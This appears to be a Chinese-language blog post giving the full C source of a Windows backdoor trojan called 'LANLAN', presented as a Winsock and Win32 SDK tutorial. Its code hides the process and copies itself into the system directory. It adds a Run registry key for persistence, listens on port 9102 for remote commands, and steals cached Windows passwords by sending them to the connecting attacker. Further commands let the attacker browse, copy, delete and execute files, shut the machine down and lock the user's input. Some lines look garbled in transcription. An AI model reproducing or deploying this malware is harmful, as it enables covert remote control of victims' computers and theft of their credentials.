寫文章一般都賦源代碼.除關鍵部分外向來不愛打太多說明性文字,因為覺得這樣
才比較實際,關于那些函數用法和功能大可以去翻書,哪裡講的比誰都詳細.
這裡給了一個用異步SOCKET方式, 直接調用WINSOCK API,WIN SDK寫的木馬(VC,C++ BUILDER下均編譯,調試通過),無須用戶端,編譯後才幾十K.實作了些 主要功能,檔案浏覽,上傳,下載下傳(均支援統配符),改變目錄,擷取系統資訊,從CACHE取密碼, 執行檔案,顯示程序, 發送消息,關機, 還有些控制功能, WIN 9X,NT/2000下均 可使用,在NT,2000下,因考慮到如CMD.EXE已改名或不存在,那麼程式 将毫無用處. 是以 并沒有調用CMD.EXE來完成,全部由自己來做,WIN API實作.要想自己程式通用就不要怕 麻煩.建議那些用現成控件寫木馬和網絡通訊的朋友應該看看,去熟悉這些根本所在, 尤其是在網絡 通訊方面.如果你是個程式員 我想大可不必用我多說,在開發中還沒見過哪家公司讓 用現成類 (MFC,VCL)來做的.
此程式還不很健壯,寫完後也沒來的及優化,主要是拿來讓大家熟悉一下WINSOCK和WIN SDK程式設計.
//---------------------------------------------------------------------------
// WINSOCK API,WIN SDK程式設計,無需用戶端
//
// 作者: 賈佳
//---------------------------------------------------------------------------
#include <windows.h>
#include <winsock.h>
#include <mmsystem.h>
#pragma hdrstop
#include <condefs.h>
#pragma argsused
#define RUN "//WinMon32.exe"
//注冊服務
#define SERVICE_PROC 1
//解除安裝服務
#define UNSERVICE_PROC 0
#define TH32CS_SNAPPROCESS 0x00000002
#define PROCESS_HANDLE_NAME 255
//緩沖區長度
#define dwBuffSize 2048
//指令行長度
#define dwComm 50
#define PORT 9102
#define WM_SOCKET WM_USER+1
#define PROMPT "LanLan://>"
DWORD dwVersion=MAKEWORD(1,1);
DWORD dwFlag=TRUE;
WSADATA wsaData;
SOCKET CreateSock,NewSock;
SOCKADDR_IN Sock_in,NewSock_in;
LPTSTR szReadBuff,Ob,TempBuff;
int addrlen;
//CACHE PASSWORD結構
typedef struct tagPASSWORD_CACHE_ENTRY {
WORD cbEntry;
WORD cbResource;
WORD cbPassword;
BYTE iEntry;
BYTE nType;
char abResource[1];
} PASSWORD_CACHE_ENTRY;
typedef BOOL (WINAPI *CACHECALLBACK)(PASSWORD_CACHE_ENTRY *pce,DWORD);
//CACHE PASSWORD函數原形
typedef WORD (WINAPI *PWNetEnumCachedPasswords)(
LPSTR pbPrefix,
DWORD cbPrefix,
DWORD nType,
CACHECALLBACK pfnCallback,
DWORD UNKNOWN
);
//TOOLHELP32 結構
typedef struct tagPROCESSENTRY32
{
DWORD dwSize;
DWORD cntUsage;
DWORD th32ProcessID;
DWORD th32DefaultHeapID;
DWORD th32ModuleID;
DWORD cntThreads;
DWORD th32ParentProcessID;
LONG pcPriClassBase;
DWORD dwFlags;
TCHAR szExeFile[MAX_PATH];
} PROCESSENTRY32;
typedef PROCESSENTRY32 * LPPROCESSENTRY32;
//定義TOOLHELP32,PSAPI函數指針
HANDLE (WINAPI *CreateToolhelp32Snapshot)(DWORD dwFlags,DWORD th32PD);
BOOL (WINAPI *Process32First)(HANDLE hSnapshot,LPPROCESSENTRY32 pe);
BOOL (WINAPI *Process32Next)(HANDLE hSnapshot,LPPROCESSENTRY32 pe);
BOOL (WINAPI *EnumProcesses)(DWORD* lpidProcess,DWORD cb,DWORD *cbNeeded);
DWORD (WINAPI *GetModuleFileNameExA)(HANDLE hProcess,HMODULE hModule,LPTSTR lpstrFileName,DWORD nSize);
HINSTANCE DLLInst;
DWORD (WINAPI *RegisterServiceProcess)(DWORD, DWORD);
//---------------------------------------------------------------------------
// GetOS
// 判斷作業系統
//---------------------------------------------------------------------------
DWORD WINAPI GetOS()
{
OSVERSIONINFO os;
TCHAR sVersion[MAX_PATH];
os.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
GetVersionEx(&os);
switch(os.dwPlatformId)
{
case VER_PLATFORM_WIN32_WINDOWS:
return VER_PLATFORM_WIN32_WINDOWS;
case VER_PLATFORM_WIN32_NT:
return VER_PLATFORM_WIN32_NT;
}
}
//---------------------------------------------------------------------------
// HideProc
// 注冊程序
//---------------------------------------------------------------------------
BOOL WINAPI HideProc(int mode)
{
DLLInst=LoadLibrary("KERNEL32.DLL");
if(DLLInst)
{
RegisterServiceProcess=(DWORD(WINAPI *)(DWORD,DWORD))
GetProcAddress(DLLInst,"RegisterServiceProcess");
if(RegisterServiceProcess)
{
RegisterServiceProcess(GetCurrentProcessId(),mode);
return TRUE;
}
else
return FALSE;
}
else return FALSE;
}
//---------------------------------------------------------------------------
// EnumProcess
// 枚舉程序
//---------------------------------------------------------------------------
//初始化TOOLHELP32
BOOL InitToolHelp32()
{
HINSTANCE DLLinst=LoadLibrary("KERNEL32.DLL");
if(DLLinst)
{
CreateToolhelp32Snapshot=(HANDLE(WINAPI *)(DWORD dwFlags,DWORD th32PD))
GetProcAddress(DLLinst,"CreateToolhelp32Snapshot");
Process32First=(BOOL(WINAPI *)(HANDLE hSnapshot,LPPROCESSENTRY32 pe))
GetProcAddress(DLLinst,"Process32First");
Process32Next=(BOOL(WINAPI *)(HANDLE hSnapshot,LPPROCESSENTRY32 pe))
GetProcAddress(DLLinst,"Process32Next");
if((!(UINT)CreateToolhelp32Snapshot)||(!(UINT)Process32First)||(!(UINT)Process32Next))
return FALSE;
else
return TRUE;
}
return FALSE;
}
//初始化PSAPI
BOOL InitPSAPI()
{
HINSTANCE PSAPI=LoadLibrary("PSAPI.DLL");
if(NULL==PSAPI)
return FALSE;
EnumProcesses=(BOOL(WINAPI *)(DWORD* lpidProcess,DWORD cb,DWORD *cbNeeded))
GetProcAddress(PSAPI,"EnumProcesses");
GetModuleFileNameExA=(DWORD(WINAPI *)(HANDLE hProcess,HMODULE hModule,LPTSTR lpstrFileName,DWORD nSize))
GetProcAddress(PSAPI,"GetModuleFileNameExA");
if(NULL == EnumProcesses||NULL == GetModuleFileName)
return FALSE;
else
return TRUE;
}
VOID WINAPI EnumProcess()
{
HANDLE process[255];
PROCESSENTRY32 p32;
DWORD process_ids[255];
DWORD num_processes;
TCHAR file_name[MAX_PATH];
TCHAR szTemp[MAX_PATH];
unsigned i;
wsprintf(szTemp,"/n/n/r << Process File Name >>/n/n/r");
send(NewSock,szTemp,lstrlen(szTemp),0);
switch(GetOS())
{
case VER_PLATFORM_WIN32_WINDOWS:
if(InitToolHelp32())
{
p32.dwSize=sizeof(PROCESSENTRY32);
HANDLE pName=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
BOOL Next=Process32First(pName,&p32);
i=0;
while(Next)
{
wsprintf(szTemp,"Process FileName :%s /n/r",p32.szExeFile);
send(NewSock,szTemp,lstrlen(szTemp),0);
process=OpenProcess(PROCESS_TERMINATE,0,p32.th32ProcessID);
Next=Process32Next(pName,&p32);
i++;
}
CloseHandle(pName);
}
break;
case VER_PLATFORM_WIN32_NT:
if(InitPSAPI())
{
EnumProcesses(process_ids,sizeof(process_ids),&num_processes);
for(i=0; i<num_processes; i++)
{
process=OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ
,0,process_ids);
if(GetModuleFileNameExA(process,NULL,file_name,sizeof(file_name)))
wsprintf(szTemp,"Process FileName :%s /n/r",file_name);
send(NewSock,szTemp,lstrlen(szTemp),0);
}
CloseHandle(process);
}
break;
}
}
//---------------------------------------------------------------------------
// GetCachePW
// 取CACHE密碼
//---------------------------------------------------------------------------
BOOL CALLBACK GetPass(PASSWORD_CACHE_ENTRY *pce,DWORD)
{
MoveMemory(szReadBuff,pce->abResource,pce->cbResource);
szReadBuff[pce->cbResource]=0;
CharToOem(szReadBuff,Ob);
wsprintf(TempBuff,"/n/n/r (USERNAME): %s /n/r (PASSWORD): ",Ob);
MoveMemory(szReadBuff,pce->abResource+pce->cbResource,pce->cbPassword);
szReadBuff[pce->cbPassword]=0;
CharToOem(szReadBuff,Ob);
lstrcat(TempBuff,Ob);
send(NewSock,TempBuff,dwBuffSize,0);
return TRUE;
}
BOOL WINAPI GetCachePW()
{
TCHAR szTemp[MAX_PATH];
PWNetEnumCachedPasswords WNetEnumCachedPasswords;
HINSTANCE DLLinst=LoadLibrary("MPR.DLL");
if(!DLLinst)
{
return FALSE;
}
wsprintf(szTemp,"/n/n/r << Win 9x Cache Password >>/n/r");
send(NewSock,szTemp,lstrlen(szTemp),0);
WNetEnumCachedPasswords=(PWNetEnumCachedPasswords)
GetProcAddress(DLLinst,"WNetEnumCachedPasswords");
if(!WNetEnumCachedPasswords)
{
return FALSE;
}
else
{
szReadBuff=(LPTSTR)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,dwBuffSize);
Ob=(LPTSTR)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,dwBuffSize);
TempBuff=(LPTSTR)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,dwBuffSize);
WNetEnumCachedPasswords(0,0,0xff,GetPass,0);
HeapFree(GetProcessHeap(),dwBuffSize,szReadBuff);
HeapFree(GetProcessHeap(),dwBuffSize,Ob);
HeapFree(GetProcessHeap(),dwBuffSize,TempBuff);
FreeLibrary(DLLinst);
}
return TRUE;
}
//---------------------------------------------------------------------------
// LoadProcess
// 執行檔案
//---------------------------------------------------------------------------
BOOL WINAPI LoadProcess(LPCTSTR szFileName)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si,sizeof(STARTUPINFO));
ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
si.cb=sizeof(STARTUPINFO);
si.dwFlags=STARTF_USESHOWWINDOW;
si.wShowWindow=SW_SHOWNORMAL;
if(CreateProcess(szFileName,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi)==FALSE)
{
return FALSE;
}
return TRUE;
}
//---------------------------------------------------------------------------
// Dir
// 浏覽檔案,支援統配符
//---------------------------------------------------------------------------
VOID WINAPI Dir(LPCTSTR lParam)
{
WIN32_FIND_DATA wfd;
HANDLE hHandle;
TCHAR szFileName[MAX_PATH];
int i;
wsprintf(szFileName,"/n/n/r");
send(NewSock,szFileName,lstrlen(szFileName),0);
lstrcpy(szFileName,lParam);
if((hHandle=FindFirstFile(szFileName,&wfd))!=INVALID_HANDLE_VALUE)
{
do
{
switch(wfd.dwFileAttributes)
{
case FILE_ATTRIBUTE_ARCHIVE:
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
break;
case FILE_ATTRIBUTE_DIRECTORY:
wsprintf(szFileName,"%-20s %10lu <DIR>/n/r",wfd.cFileName,wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
break;
case FILE_ATTRIBUTE_HIDDEN:
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
break;
case FILE_ATTRIBUTE_READONLY:
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
break;
case FILE_ATTRIBUTE_SYSTEM:
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu ARCHIVE/n/r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
break;
}
}while(FindNextFile(hHandle,&wfd));
}
else
{
wsprintf(szFileName,"Can not find directory or files./n/r");
send(NewSock,szFileName,lstrlen(szFileName),0);
}
}
//---------------------------------------------------------------------------
// FileOpertion
// 檔案操作函數
//---------------------------------------------------------------------------
BOOL WINAPI FileOpertion(LPCTSTR szFileName1,LPCTSTR szFileName2,DWORD opt)
{
SHFILEOPSTRUCT shf;
TCHAR sr[MAX_PATH];
TCHAR de[MAX_PATH];
lstrcpy(sr,szFileName1);
sr[lstrlen(sr)+1]=‘/0‘;
lstrcpy(de,szFileName2);
de[lstrlen(de)+1]=‘/0‘;
ZeroMemory(&shf,sizeof(shf));
shf.hwnd=NULL;
shf.wFunc=opt;
shf.pFrom=sr;
shf.pTo=de;
shf.fFlags=FOF_ALLOWUNDO|FOF_SILENT|FOF_FILESONLY|FOF_MULTIDESTFILES
|FOF_NOCONFIRMATION|FOF_NOCONFIRMMKDIR;
if(SHFileOperation(&shf))
return FALSE;
else
return TRUE;
}
//---------------------------------------------------------------------------
// Delete
// 删除檔案(隐藏,隻讀),目錄,支援統配符
//---------------------------------------------------------------------------
VOID WINAPI Delete(LPCTSTR lParam)
{
if(!FileOpertion(lParam,"",FO_DELETE))
send(NewSock,"Delete File is Fail",20,0);
else
send(NewSock,"Delete File is OK",17,0);
}
//---------------------------------------------------------------------------
// Copy
// 複制,上傳,下載下傳檔案(需先将自己硬碟設定為完全共享),支援統配符
//---------------------------------------------------------------------------
VOID WINAPI Copy(LPCTSTR lParam1,LPCTSTR lParam2)
{
if(!FileOpertion(lParam1,lParam2,FO_COPY))
send(NewSock,"Copy File is Fail",18,0);
else
send(NewSock,"Copy File is OK",15,0);
}
//---------------------------------------------------------------------------
// Ren
// 檔案,目錄重命名
//---------------------------------------------------------------------------
VOID WINAPI Ren(LPCTSTR lParam1,LPCTSTR lParam2)
{
if(!FileOpertion(lParam1,lParam2,FO_RENAME))
send(NewSock,"Renname File is Fail",21,0);
else
send(NewSock,"Reanme File is OK",18,0);
}
//---------------------------------------------------------------------------
// GetSysInfo
// 擷取系統資訊
//---------------------------------------------------------------------------
VOID WINAPI GetSysInfo()
{
TCHAR szBuff[MAX_PATH];
TCHAR szTemp[MAX_PATH];
wsprintf(szBuff,"/n/n/r<<System Information>>/n/n/r");
send(NewSock,szBuff,lstrlen(szBuff),0);
//計算機名
DWORD len=sizeof(szTemp);
GetComputerName(szTemp,&len);
wsprintf(szBuff,"Computer Name: %s/n/n/r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
//目前作業系統
switch(GetOS())
{
case VER_PLATFORM_WIN32_WINDOWS:
lstrcpy(szTemp,"Windows 9x");
break;
case VER_PLATFORM_WIN32_NT:
lstrcpy(szTemp,"Windows NT/2000");
break;
}
wsprintf(szBuff,"Option System: %s/n/n/r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
//記憶體容量
MEMORYSTATUS mem;
mem.dwLength=sizeof(mem);
GlobalMemoryStatus(&mem);
wsprintf(szBuff,"Total Memroy: %dM/n/n/r",mem.dwTotalPhys/1024/1024+1);
send(NewSock,szBuff,lstrlen(szBuff),0);
//系統目錄
TCHAR szPath[MAX_PATH];
GetWindowsDirectory(szTemp,sizeof(szTemp));
GetSystemDirectory(szBuff,sizeof(szBuff));
wsprintf(szPath,"Windows Directory: %s/n/n/rSystem Directory: %s/n/n/r",szTemp,szBuff);
send(NewSock,szPath,lstrlen(szPath),0);
//驅動器及分區類型
TCHAR szFileSys[10];
for(int i=0;i<26;++i)
{
wsprintf(szTemp,"%c://",‘A‘+i);
UINT uType=GetDriveType(szTemp);
switch(uType)
{
case DRIVE_FIXED:
GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH);
wsprintf(szBuff,"Hard Disk: %s (%s)/n/n/r",szTemp,szFileSys);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
case DRIVE_CDROM:
wsprintf(szBuff,"CD-ROM Disk: %s/n/n/r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
case DRIVE_REMOTE:
GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH);
wsprintf(szBuff,"NetWork Disk: %s (%s)/n/n/r",szTemp,szFileSys);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
}
}
}
//---------------------------------------------------------------------------
// ExitWin
// 關閉計算機(WIN 9X,NT/2000)
//---------------------------------------------------------------------------
VOID WINAPI ExitWin()
{
DWORD dwVer;
HANDLE hProcess, hToken;
TOKEN_PRIVILEGES NewState;
DWORD ProcessId, ReturnLength = 0;
LUID luidPrivilegeLUID;
dwVer=GetOS();
if(dwVer==VER_PLATFORM_WIN32_WINDOWS)
ExitWindowsEx(1,0);
else if(dwVer==VER_PLATFORM_WIN32_NT)
{
ProcessId = GetCurrentProcessId();
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES, &hToken);
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &luidPrivilegeLUID);
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Luid = luidPrivilegeLUID;
NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL))
ExitWindowsEx(EWX_FORCE|EWX_POWEROFF,0);
}
}
//---------------------------------------------------------------------------
// CtrlCD
// 光驅控制
//---------------------------------------------------------------------------
VOID WINAPI CtrlCD(HWND hWnd,BOOL Ctrl)
{
switch(Ctrl)
{
case TRUE:
mciSendString("Set cdaudio door open wait",NULL,0,hWnd);
break;
case FALSE:
mciSendString("Set cdaudio door closed wait",NULL,0,hWnd);
break;
}
}
//---------------------------------------------------------------------------
// PopMsg
// 發送消息
//---------------------------------------------------------------------------
VOID WINAPI PopMsg(LPCTSTR message,HWND hWnd)
{
MessageBox(hWnd,message,"PopMsg",MB_OK);
}
//---------------------------------------------------------------------------
// ChangeDir
// 改變目前目錄
//---------------------------------------------------------------------------
BOOL WINAPI ChangeDir(LPCTSTR szDir)
{
if(SetCurrentDirectory(szDir))
return TRUE;
else
return FALSE;
}
//---------------------------------------------------------------------------
// GetCurPath
// 得到目前目錄
//---------------------------------------------------------------------------
VOID WINAPI GetCurPath()
{
TCHAR lpBuff[MAX_PATH];
TCHAR szTemp[MAX_PATH];
GetCurrentDirectory(MAX_PATH,lpBuff);
wsprintf(szTemp,"CurrentDirect: %s/n/r",lpBuff);
send(NewSock,szTemp,lstrlen(szTemp),0);
}
//---------------------------------------------------------------------------
// HSSys
// 顯示,隐藏桌面,工作列
//---------------------------------------------------------------------------
VOID WINAPI HSSys(HWND hWnd,BOOL Ctrl)
{
switch(Ctrl)
{
case FALSE:
hWnd=FindWindow("Progman",NULL);
ShowWindow(hWnd,SW_HIDE);
hWnd=FindWindow("Sh*ll _TrayWnd",NULL);
ShowWindow(hWnd,SW_HIDE);
break;
case TRUE:
hWnd=FindWindow("Progman",NULL);
ShowWindow(hWnd,SW_SHOW);
hWnd=FindWindow("Sh*ll _TrayWnd",NULL);
ShowWindow(hWnd,SW_SHOW);
break;
}
}
//---------------------------------------------------------------------------
// LockMK
// 鎖定滑鼠,功能鍵
//---------------------------------------------------------------------------
VOID WINAPI LockMK(BOOL Ctrl)
{
RECT rc;
switch(Ctrl)
{
case TRUE:
ZeroMemory(&rc,sizeof(rc));
ClipCursor(&rc);
SystemParametersInfo(SPI_SCREENSAVERRUNNING,TRUE,NULL,0);
SystemParametersInfo(SPI_SETFASTTASKSWITCH,TRUE,NULL,0);
break;
case FALSE:
ClipCursor(NULL);
SystemParametersInfo(SPI_SCREENSAVERRUNNING,FALSE,NULL,0);
SystemParametersInfo(SPI_SETFASTTASKSWITCH,FALSE,NULL,0);
break;
}
}
//---------------------------------------------------------------------------
// ExeCommand
// 執行指令
//---------------------------------------------------------------------------
VOID ExeCommand(LPCTSTR szCommand,HWND hWnd)
{
TCHAR szBuf[MAX_PATH];
TCHAR Param1[100];
TCHAR Param2[100];
int i;
if((lstrcmp(szCommand,"getpw"))==0)
GetCachePW();
else if((lstrcmp(szCommand,"getinfo"))==0)
GetSysInfo();
else if((lstrcmp(szCommand,"gcpath"))==0)
GetCurPath();
else if((lstrcmp(szCommand,"opencd"))==0)
CtrlCD(hWnd,TRUE);
else if((lstrcmp(szCommand,"closecd"))==0)
CtrlCD(hWnd,FALSE);
else if((lstrcmp(szCommand,"showsys"))==0)
HSSys(hWnd,TRUE);
else if((lstrcmp(szCommand,"hidesys"))==0)
HSSys(hWnd,FALSE);
else if((lstrcmp(szCommand,"lockmk"))==0)
LockMK(TRUE);
else if((lstrcmp(szCommand,"unlock"))==0)
LockMK(FALSE);
else if((lstrcmp(szCommand,"dproc"))==0)
EnumProcess();
else if((lstrcmp(szCommand,"exitwin"))==0)
ExitWin();
else if((strncmp(szCommand,"popmsg",lstrlen("popmsg")))==0)
{
if(lstrlen(szCommand)<=lstrlen("popmsg")+2)
{
send(NewSock,"usage : popmsg Message",28,0);
}
for(i=lstrlen("popmsg")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘ ‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("popmsg")+1);
PopMsg(Param1,hWnd);
}
}
else if((strncmp(szCommand,"execfile",lstrlen("execfile")))==0)
{
if(lstrlen(szCommand)<=lstrlen("execfile")+2)
{
send(NewSock,"usage : execfile szFileName",28,0);
}
for(i=lstrlen("execfile")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘ ‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("execfile")+1);
if(LoadProcess(Param1)==FALSE)
send(NewSock,"execfile Fail",14,0);
else
send(NewSock,"execfile OK",11,0);
}
}
else if((strncmp(szCommand,"cd",lstrlen("cd")))==0)
{
if(lstrlen(szCommand)<=lstrlen("cd")+2)
{
send(NewSock,"cd Drive//Directory",19,0);
}
for(i=lstrlen("cd")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘ ‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("cd")+1);
if(ChangeDir(Param1)==FALSE)
send(NewSock,"Change Directory Fail",21,0);
else
send(NewSock,"Change Directory OK",19,0);
}
}
else if((strncmp(szCommand,"dir",lstrlen("dir")))==0)
{
if(lstrlen(szCommand)<=lstrlen("dir")+2)
{
Dir("*.*");
}
for(i=lstrlen("dir")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘ ‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("dir")+1);
Dir(Param1);
}
}
else if((strncmp(szCommand,"del",lstrlen("del")))==0)
{
if(lstrlen(szCommand)<=lstrlen("del")+2)
{
send(NewSock,"usage : DEL szFileName",28,0);
}
for(i=lstrlen("del")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘ ‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("del")+1);
Delete(Param1);
}
}
else if((strncmp(szCommand,"copy",lstrlen("copy")))==0)
{
if(lstrlen(szCommand)<=lstrlen("COPY")+2)
{
send(NewSock,"usage : COPY Drive//Filename ",28,0);
return;
}
for(i=lstrlen("copy")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘ ‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("copy")+1);
lstrcpy(Param2,"");
send(NewSock,"Copy File1 to File2",19,0);
}
else
{
lstrcpy(szBuf,szCommand);
szBuf=0;
lstrcpy(Param1,szBuf+lstrlen("copy")+1);
lstrcpy(Param2,szBuf+i+1);
Copy(Param1,Param2);
}
}
else if((strncmp(szCommand,"ren",lstrlen("ren")))==0)
{
if(lstrlen(szCommand)<=lstrlen("ren")+2)
{
send(NewSock,"usage : REN Drive//Filename ",28,0);
return;
}
for(i=lstrlen("ren")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘ ‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("ren")+1);
lstrcpy(Param2,"");
send(NewSock,"Ren File1 to File2",19,0);
}
else
{
lstrcpy(szBuf,szCommand);
szBuf=0;
lstrcpy(Param1,szBuf+lstrlen("ren")+1);
lstrcpy(Param2,szBuf+i+1);
Ren(Param1,Param2);
}
}
else
send(NewSock,"Bad Command !!!",16,0);
}
//---------------------------------------------------------------------------
// InitSocket
// 初始化SOCKET
//--------------------------------------------------------------------------
BOOL WINAPI InitSocket(HWND hWnd)
{
if((WSAStartup(dwVersion,&wsaData))!=0)
{
MessageBox(hWnd,"INIT SOCKET ERROR",NULL,MB_OK);
return FALSE;
}
CreateSock=socket(AF_INET,SOCK_STREAM,0);
if(CreateSock==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"SOCKET ERROR",NULL,MB_OK);
return FALSE;
}
Sock_in.sin_family=AF_INET;
Sock_in.sin_port=htons(PORT);
Sock_in.sin_addr.S_un.S_addr=htonl(INADDR_ANY);
setsockopt(CreateSock,SOL_SOCKET,SO_REUSEADDR,(LPSTR)&dwFlag,sizeof(dwFlag));
if(bind(CreateSock,(LPSOCKADDR)&Sock_in,sizeof(Sock_in))==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"BIND ERROR",NULL,MB_OK);
return FALSE;
}
else if(listen(CreateSock,3)==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"LISTEN ERROR",NULL,MB_OK);
return FALSE;
}
else if(WSAAsyncSelect(CreateSock,hWnd,WM_SOCKET,FD_ACCEPT|FD_CLOSE)==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"WSASelect ERROR",NULL,MB_OK);
return FALSE;
}
addrlen=sizeof(SOCKADDR_IN);
return TRUE;
}
//---------------------------------------------------------------------------
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
{
static TCHAR szCommand[dwComm];
static TCHAR szExec[dwComm];
switch(message)
{
case WM_SOCKET:
if(WSAGETSELECTERROR(lParam))
{
closesocket(wParam);
break;
}
switch(WSAGETSELECTEVENT(lParam))
{
//連接配接
case FD_ACCEPT:
NewSock=accept(CreateSock,(LPSOCKADDR)&NewSock_in,&addrlen);
WSAAsyncSelect(NewSock,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE);
wsprintf(szCommand,"LANLAN Ver 1.0 Write by VIRUS/n/n/r%s",PROMPT);
send(NewSock,szCommand,dwComm,0);
break;
//讀取輸入,如是回車則執行指令
//不是将輸入複制到緩沖區
case FD_READ:
ZeroMemory(szCommand,dwComm);
recv(NewSock,szCommand,dwComm,0);
if(szCommand[0]==VK_RETURN)
{
wsprintf(szCommand,"/n/n/r%s",PROMPT);
send(NewSock,szCommand,dwComm,0);
ExeCommand(szExec,hWnd);
ZeroMemory(szExec,dwComm);
}
else
lstrcat(szExec,szCommand);
send(NewSock,szCommand,dwComm,0);
break;
case FD_CLOSE:
closesocket(wParam);
break;
}
break;
case WM_DESTROY:
HideProc(UNSERVICE_PROC);
PostQuitMessage(0);
break;
default:
return DefWindowProc(hWnd,message,wParam,lParam);
}
return 0;
}
//---------------------------------------------------------------------------
WINAPI WinMain(HINSTANCE hInstance, HINSTANCE, LPSTR, int)
{
HWND hWnd;
MSG msg;
WNDCLASS wndc;
LPSTR szAppName="LANLAN";
HKEY hKey=0;
DWORD disp=0;
LONG lResult;
TCHAR szKey[MAX_PATH];
TCHAR szSysDir[MAX_PATH+25];
TCHAR szFileName[MAX_PATH];
wndc.style=0;
wndc.lpfnWndProc=WndProc;
wndc.cbClsExtra=0;
wndc.cbWndExtra=0;
wndc.hInstance=hInstance;
wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION);
wndc.hCursor=LoadCursor(NULL,IDC_ARROW);
wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wndc.lpszMenuName=NULL;
wndc.lpszClassName=szAppName;
RegisterClass(&wndc);
hWnd=CreateWindow(szAppName,"LANLANServer",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT,CW_USEDEFAULT,
NULL,NULL,hInstance,NULL);
ShowWindow(hWnd,SW_HIDE);
UpdateWindow(hWnd);
if(GetOS()==VER_PLATFORM_WIN32_WINDOWS)
{
HideProc(SERVICE_PROC);
}
InitSocket(hWnd);
//複制檔案到系統目錄
//并加載系統資料庫,自動運作
GetSystemDirectory(szSysDir,MAX_PATH);
lstrcat(szSysDir,RUN);
GetModuleFileName(NULL,szFileName,MAX_PATH);
CopyFile(szFileName,szSysDir,FALSE);
lstrcpy(szKey,"SOFTWARE//Microsoft//Windows//CurrentVersion//Run");
lResult=RegCreateKeyEx(HKEY_LOCAL_MACHINE,szKey,0,NULL,REG_OPTION_VOLATILE,
KEY_ALL_ACCESS,NULL,&hKey,&disp);
if(lResult==ERROR_SUCCESS)
{
lResult=RegSetValueEx(hKey,"WinMon32",0,REG_SZ,szSysDir,lstrlen(szSysDir));
RegCloseKey(hKey);
}
while(GetMessage(&msg,NULL,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return (msg.wParam);
}
![處理PCX檔案[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)